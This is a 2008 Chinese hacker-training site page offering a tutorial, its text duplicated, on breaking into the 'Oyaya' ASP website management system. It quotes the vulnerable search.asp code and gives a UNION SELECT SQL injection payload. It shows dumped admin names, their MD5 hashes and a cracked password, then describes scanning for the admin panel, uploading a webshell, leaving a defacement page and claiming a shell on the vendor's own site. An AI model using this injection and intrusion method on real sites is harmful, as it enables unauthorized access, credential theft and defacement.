 |
 |
asp入侵6--凹丫丫网站管理系统 by 小冰
| 授权类型: | 黑客 | 特别说明: |
| 软件分类: | 一天学一点 | |
| 文件大小: | MB | |
| 星级评定: |  |
|
| 发 布 人: | 幻泉 | |
| 发布时间: | 2008-12-31 1:24:02 | |
| 下载权限: | 10,9,8,7,6,5,11,12,13 | |
| 权限说明: | 0 游客;1 普通用户;2 C培训班;3 工具培训班;4 脚本培训班;
5 黑客防线技术团队;6 银牌VIP;7 金牌VIP;8 钻石VIP;
9 铂金VIP;10 管理用户;11 贵宾组;12 核心组;13 顾问组;
15 linux培训班;16 漏洞发掘培训班;17 delphi培训班;
18 java培训班;19 综合实战班;20 vc远控编写班;21 win服务器安全;
22 逆向工程培训班;23 高级xss培训班;24 驱动开发培训班. *无下载权限显示则表示所有注册会员均可下载。 |
|
| 下载次数: | 231 人次 | |
| 下载地址: |
 下载地址1
|
|
[实战][黑防]Z.S.T 议题:[入侵]asp入侵6--凹丫丫网站管理系统
大家好我是CAT 嘿嘿
本来是准备这次不准备做教程滴。。但是幻泉大哥一定要我们做没办法丫 。。最主要的是这不是我的原创。。借鉴了论坛技术指导滴 。。哈哈我还是做出来当自己的整理了哈把
幻泉说了是cookies注入。。那我们就来搜索哈咯 。。。嘿嘿 。。
这里就是搜索的结果咯 。。admin目录我们就不用看了。。因为进行了身份验证。。。其他的几个文件也都调用了SQL防注入只有search文件没 。。。可以进行post的注入或者cookies注入 。。我这里没有风谷兄的绿色浏览器所以我也就不做cookies了 。。
就讲哈post的提交把 。。。我们看看search的代码 。。
<%
key=request("key")
otype=request("otype")
if key="" then
response.write "<script>alert('查找字符串不能为空!');history.back();</script>"
response.end
end if
function boldword(strcontent,key)
dim objregexp
set objregexp=new regexp
objregexp.ignorecase =true
objregexp.global=true
objregexp.pattern="(" & key & ")"
strcontent=objregexp.replace(strcontent,"<font color=""#ff0000"">$1</font>" )
set objregexp=nothing
boldword=strcontent
end function
%>
这里只判断了字符串是否为空。。
然后就直接进行了数据库的查询操作。。。。
sql="select * from news where title like '%"& key &"%' order by id desc"
elseif otype="msg" then
sql="select * from news where content like '%"& key &"%' order by id desc"
elseif otype="dtitle" then
sql="select * from Download where title like '%"& key &"%' order by id desc"
elseif otype="dmsg" then
sql="select * from Download where Content like '%"& key &"%' order by id desc"
end if
rs.open sql,conn,1,1
if rs.eof and rs.bof then
post提交的表单论坛 Cschii 已经给出了利用代码。。我也就不多做解释咯。。
就是改了查询的值。。
value="456%' union select id,password,3,4,5,6,7,8,9,10,11,admin,aleave
有点我不是很清楚就是这里为什么不能用空格了 ??注意value中使用的不是正常的空格,而是Tab空格
我们直接保存为网页的格式。。
就直接可以查询出账户密码了。。
2 279673e611d21a4edd870341e1b05296 admin super
1 c33367701511b4f6020ec61ded352059 oyaya super
再MD5这里风谷兄说md5要中间的16位 。。但是我就直接查询的也可以得到密码??看了MD5的代码好像是取的中间的16位。。。
md5 = lcase(wordtohex(a) & wordtohex(b) & wordtohex(c) & wordtohex(d)) '32byte
'md5 = lcase(wordtohex(b) & wordtohex(c)) 'i crop this to fit 16byte database password :d
哎呀。。。好像下面这条前面有个 ' 好像是注释语句把。。。恩 直接出来密码654321
后台我直接用扫描目录的工具扫了哈 改成user的目录就OK了。。
进了后台就很简单了。。。。直接上传备份。。。这就不用我演示了把 。。。哈哈
我的shell的地址没记录。。所以不知道去哪里了。。。但是留了黑页
Hacker By:小冰 QQ:81612543 呵呵
献丑咯 。。。教程到此结束咯。。。。嘿嘿。。
再说哈 官方的安全也不怎么滴 。。。我直接拿到了官方的shell。。提醒了哈 。。
哈哈 。。
大家好我是CAT 嘿嘿
本来是准备这次不准备做教程滴。。但是幻泉大哥一定要我们做没办法丫 。。最主要的是这不是我的原创。。借鉴了论坛技术指导滴 。。哈哈我还是做出来当自己的整理了哈把
幻泉说了是cookies注入。。那我们就来搜索哈咯 。。。嘿嘿 。。
这里就是搜索的结果咯 。。admin目录我们就不用看了。。因为进行了身份验证。。。其他的几个文件也都调用了SQL防注入只有search文件没 。。。可以进行post的注入或者cookies注入 。。我这里没有风谷兄的绿色浏览器所以我也就不做cookies了 。。
就讲哈post的提交把 。。。我们看看search的代码 。。
<%
key=request("key")
otype=request("otype")
if key="" then
response.write "<script>alert('查找字符串不能为空!');history.back();</script>"
response.end
end if
function boldword(strcontent,key)
dim objregexp
set objregexp=new regexp
objregexp.ignorecase =true
objregexp.global=true
objregexp.pattern="(" & key & ")"
strcontent=objregexp.replace(strcontent,"<font color=""#ff0000"">$1</font>" )
set objregexp=nothing
boldword=strcontent
end function
%>
这里只判断了字符串是否为空。。
然后就直接进行了数据库的查询操作。。。。
sql="select * from news where title like '%"& key &"%' order by id desc"
elseif otype="msg" then
sql="select * from news where content like '%"& key &"%' order by id desc"
elseif otype="dtitle" then
sql="select * from Download where title like '%"& key &"%' order by id desc"
elseif otype="dmsg" then
sql="select * from Download where Content like '%"& key &"%' order by id desc"
end if
rs.open sql,conn,1,1
if rs.eof and rs.bof then
post提交的表单论坛 Cschii 已经给出了利用代码。。我也就不多做解释咯。。
就是改了查询的值。。
value="456%' union select id,password,3,4,5,6,7,8,9,10,11,admin,aleave
有点我不是很清楚就是这里为什么不能用空格了 ??注意value中使用的不是正常的空格,而是Tab空格
我们直接保存为网页的格式。。
就直接可以查询出账户密码了。。
2 279673e611d21a4edd870341e1b05296 admin super
1 c33367701511b4f6020ec61ded352059 oyaya super
再MD5这里风谷兄说md5要中间的16位 。。但是我就直接查询的也可以得到密码??看了MD5的代码好像是取的中间的16位。。。
md5 = lcase(wordtohex(a) & wordtohex(b) & wordtohex(c) & wordtohex(d)) '32byte
'md5 = lcase(wordtohex(b) & wordtohex(c)) 'i crop this to fit 16byte database password :d
哎呀。。。好像下面这条前面有个 ' 好像是注释语句把。。。恩 直接出来密码654321
后台我直接用扫描目录的工具扫了哈 改成user的目录就OK了。。
进了后台就很简单了。。。。直接上传备份。。。这就不用我演示了把 。。。哈哈
我的shell的地址没记录。。所以不知道去哪里了。。。但是留了黑页
Hacker By:小冰 QQ:81612543 呵呵
献丑咯 。。。教程到此结束咯。。。。嘿嘿。。
再说哈 官方的安全也不怎么滴 。。。我直接拿到了官方的shell。。提醒了哈 。。
哈哈 。。
相关黑客软件
